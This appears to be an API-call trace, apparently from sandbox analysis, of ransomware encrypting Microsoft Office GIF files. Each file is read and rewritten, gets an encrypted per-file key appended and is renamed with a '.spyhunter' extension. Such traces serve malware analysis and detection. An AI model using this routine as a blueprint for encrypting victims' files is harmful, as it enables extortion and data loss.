0x0 [0102.434] GetProcessHeap () returned 0x2c0000 [0102.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0102.434] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f894, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f894*=0xaf, lpOverlapped=0x0) returned 1 [0102.434] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff51, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.434] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xaf, lpNumberOfBytesWritten=0x270f894, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f894*=0xaf, lpOverlapped=0x0) returned 1 [0102.435] GetProcessHeap () returned 0x2c0000 [0102.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0102.435] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.435] WriteFile (in: hFile=0x170, lpBuffer=0x270f8d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f894, lpOverlapped=0x0 | out: lpBuffer=0x270f8d4*, lpNumberOfBytesWritten=0x270f894*=0x4, lpOverlapped=0x0) returned 1 [0102.435] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f894, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f894*=0x30, lpOverlapped=0x0) returned 1 [0102.435] CloseHandle (hObject=0x170) returned 1 [0102.435] GetProcessHeap () returned 0x2c0000 [0102.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0102.435] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21377_.GIF.spyhunter") returned 83 [0102.435] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21377_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21377_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21377_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21377_.gif.spyhunter")) returned 1 [0102.436] GetProcessHeap () returned 0x2c0000 [0102.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0102.436] GetProcessHeap () returned 0x2c0000 [0102.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0102.436] GetProcessHeap () returned 0x2c0000 [0102.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33b180 | out: hHeap=0x2c0000) returned 1 [0102.436] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8d8 | out: pbBuffer=0x270f8d8) returned 1 [0102.436] GetProcessHeap () returned 0x2c0000 [0102.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0102.436] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8d0*=0x30) returned 1 [0102.436] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21376_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21376_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0102.437] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21376_.GIF") returned 73 [0102.437] StrStrW (lpFirst="BD21376_.GIF", lpSrch=".txt") returned 0x0 [0102.437] GetProcessHeap () returned 0x2c0000 [0102.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0102.437] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f894, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f894*=0xb4, lpOverlapped=0x0) returned 1 [0102.438] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff4c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.438] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x270f894, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f894*=0xb4, lpOverlapped=0x0) returned 1 [0102.438] GetProcessHeap () returned 0x2c0000 [0102.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0102.438] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.438] WriteFile (in: hFile=0x170, lpBuffer=0x270f8d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f894, lpOverlapped=0x0 | out: lpBuffer=0x270f8d4*, lpNumberOfBytesWritten=0x270f894*=0x4, lpOverlapped=0x0) returned 1 [0102.438] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f894, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f894*=0x30, lpOverlapped=0x0) returned 1 [0102.438] CloseHandle (hObject=0x170) returned 1 [0102.439] GetProcessHeap () returned 0x2c0000 [0102.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0102.439] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21376_.GIF.spyhunter") returned 83 [0102.439] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21376_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21376_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21376_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21376_.gif.spyhunter")) returned 1 [0102.439] GetProcessHeap () returned 0x2c0000 [0102.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0102.439] GetProcessHeap () returned 0x2c0000 [0102.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0102.439] GetProcessHeap () returned 0x2c0000 [0102.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33b0a0 | out: hHeap=0x2c0000) returned 1 [0102.440] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8d0 | out: pbBuffer=0x270f8d0) returned 1 [0102.440] GetProcessHeap () returned 0x2c0000 [0102.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0102.440] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8c8*=0x30) returned 1 [0102.440] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21375_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21375_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0102.440] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21375_.GIF") returned 73 [0102.440] StrStrW (lpFirst="BD21375_.GIF", lpSrch=".txt") returned 0x0 [0102.440] GetProcessHeap () returned 0x2c0000 [0102.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0102.440] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f88c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f88c*=0xd4, lpOverlapped=0x0) returned 1 [0102.441] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.441] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xd4, lpNumberOfBytesWritten=0x270f88c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f88c*=0xd4, lpOverlapped=0x0) returned 1 [0102.441] GetProcessHeap () returned 0x2c0000 [0102.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0102.441] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.441] WriteFile (in: hFile=0x170, lpBuffer=0x270f8cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f88c, lpOverlapped=0x0 | out: lpBuffer=0x270f8cc*, lpNumberOfBytesWritten=0x270f88c*=0x4, lpOverlapped=0x0) returned 1 [0102.441] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f88c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f88c*=0x30, lpOverlapped=0x0) returned 1 [0102.441] CloseHandle (hObject=0x170) returned 1 [0102.442] GetProcessHeap () returned 0x2c0000 [0102.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0102.442] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21375_.GIF.spyhunter") returned 83 [0102.442] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21375_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21375_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21375_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21375_.gif.spyhunter")) returned 1 [0102.442] GetProcessHeap () returned 0x2c0000 [0102.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0102.442] GetProcessHeap () returned 0x2c0000 [0102.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0102.442] GetProcessHeap () returned 0x2c0000 [0102.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33afc0 | out: hHeap=0x2c0000) returned 1 [0102.442] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8d0 | out: pbBuffer=0x270f8d0) returned 1 [0102.442] GetProcessHeap () returned 0x2c0000 [0102.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0102.443] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8c8*=0x30) returned 1 [0102.443] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21366_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21366_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0102.443] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21366_.GIF") returned 73 [0102.443] StrStrW (lpFirst="BD21366_.GIF", lpSrch=".txt") returned 0x0 [0102.443] GetProcessHeap () returned 0x2c0000 [0102.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0102.443] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f88c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f88c*=0xc8, lpOverlapped=0x0) returned 1 [0102.444] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.444] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xc8, lpNumberOfBytesWritten=0x270f88c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f88c*=0xc8, lpOverlapped=0x0) returned 1 [0102.444] GetProcessHeap () returned 0x2c0000 [0102.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0102.444] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.444] WriteFile (in: hFile=0x170, lpBuffer=0x270f8cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f88c, lpOverlapped=0x0 | out: lpBuffer=0x270f8cc*, lpNumberOfBytesWritten=0x270f88c*=0x4, lpOverlapped=0x0) returned 1 [0102.444] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f88c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f88c*=0x30, lpOverlapped=0x0) returned 1 [0102.444] CloseHandle (hObject=0x170) returned 1 [0102.444] GetProcessHeap () returned 0x2c0000 [0102.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0102.444] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21366_.GIF.spyhunter") returned 83 [0102.445] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21366_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21366_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21366_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21366_.gif.spyhunter")) returned 1 [0102.445] GetProcessHeap () returned 0x2c0000 [0102.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0102.445] GetProcessHeap () returned 0x2c0000 [0102.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0102.445] GetProcessHeap () returned 0x2c0000 [0102.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33aee0 | out: hHeap=0x2c0000) returned 1 [0102.445] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8c8 | out: pbBuffer=0x270f8c8) returned 1 [0102.445] GetProcessHeap () returned 0x2c0000 [0102.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0102.445] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8c0*=0x30) returned 1 [0102.445] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21365_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21365_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0102.448] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21365_.GIF") returned 73 [0102.448] StrStrW (lpFirst="BD21365_.GIF", lpSrch=".txt") returned 0x0 [0102.448] GetProcessHeap () returned 0x2c0000 [0102.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0102.449] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f884, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f884*=0xec, lpOverlapped=0x0) returned 1 [0102.449] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.450] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x270f884, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f884*=0xec, lpOverlapped=0x0) returned 1 [0102.450] GetProcessHeap () returned 0x2c0000 [0102.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0102.450] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.450] WriteFile (in: hFile=0x170, lpBuffer=0x270f8c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f884, lpOverlapped=0x0 | out: lpBuffer=0x270f8c4*, lpNumberOfBytesWritten=0x270f884*=0x4, lpOverlapped=0x0) returned 1 [0102.450] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f884, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f884*=0x30, lpOverlapped=0x0) returned 1 [0102.450] CloseHandle (hObject=0x170) returned 1 [0102.450] GetProcessHeap () returned 0x2c0000 [0102.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0102.450] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21365_.GIF.spyhunter") returned 83 [0102.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21365_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21365_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21365_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21365_.gif.spyhunter")) returned 1 [0102.451] GetProcessHeap () returned 0x2c0000 [0102.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0102.451] GetProcessHeap () returned 0x2c0000 [0102.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0102.451] GetProcessHeap () returned 0x2c0000 [0102.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33ae00 | out: hHeap=0x2c0000) returned 1 [0102.451] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8c8 | out: pbBuffer=0x270f8c8) returned 1 [0102.451] GetProcessHeap () returned 0x2c0000 [0102.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0102.451] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8c0*=0x30) returned 1 [0102.451] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21364_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21364_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0102.452] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21364_.GIF") returned 73 [0102.452] StrStrW (lpFirst="BD21364_.GIF", lpSrch=".txt") returned 0x0 [0102.452] GetProcessHeap () returned 0x2c0000 [0102.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0102.452] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f884, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f884*=0xf5, lpOverlapped=0x0) returned 1 [0102.453] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff0b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.453] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xf5, lpNumberOfBytesWritten=0x270f884, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f884*=0xf5, lpOverlapped=0x0) returned 1 [0102.453] GetProcessHeap () returned 0x2c0000 [0102.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0102.453] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.453] WriteFile (in: hFile=0x170, lpBuffer=0x270f8c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f884, lpOverlapped=0x0 | out: lpBuffer=0x270f8c4*, lpNumberOfBytesWritten=0x270f884*=0x4, lpOverlapped=0x0) returned 1 [0102.453] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f884, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f884*=0x30, lpOverlapped=0x0) returned 1 [0102.453] CloseHandle (hObject=0x170) returned 1 [0102.453] GetProcessHeap () returned 0x2c0000 [0102.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0102.453] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21364_.GIF.spyhunter") returned 83 [0102.453] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21364_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21364_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21364_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21364_.gif.spyhunter")) returned 1 [0102.454] GetProcessHeap () returned 0x2c0000 [0102.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0102.454] GetProcessHeap () returned 0x2c0000 [0102.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0102.454] GetProcessHeap () returned 0x2c0000 [0102.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33ad20 | out: hHeap=0x2c0000) returned 1 [0102.454] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8c0 | out: pbBuffer=0x270f8c0) returned 1 [0102.454] GetProcessHeap () returned 0x2c0000 [0102.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0102.454] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8b8*=0x30) returned 1 [0102.454] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21344_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21344_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0102.454] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21344_.GIF") returned 73 [0102.454] StrStrW (lpFirst="BD21344_.GIF", lpSrch=".txt") returned 0x0 [0102.454] GetProcessHeap () returned 0x2c0000 [0102.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0102.455] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f87c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f87c*=0xb2, lpOverlapped=0x0) returned 1 [0102.455] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.455] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb2, lpNumberOfBytesWritten=0x270f87c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f87c*=0xb2, lpOverlapped=0x0) returned 1 [0102.456] GetProcessHeap () returned 0x2c0000 [0102.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0102.456] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.456] WriteFile (in: hFile=0x170, lpBuffer=0x270f8bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f87c, lpOverlapped=0x0 | out: lpBuffer=0x270f8bc*, lpNumberOfBytesWritten=0x270f87c*=0x4, lpOverlapped=0x0) returned 1 [0102.456] WriteFile (in: hFile=0x170, 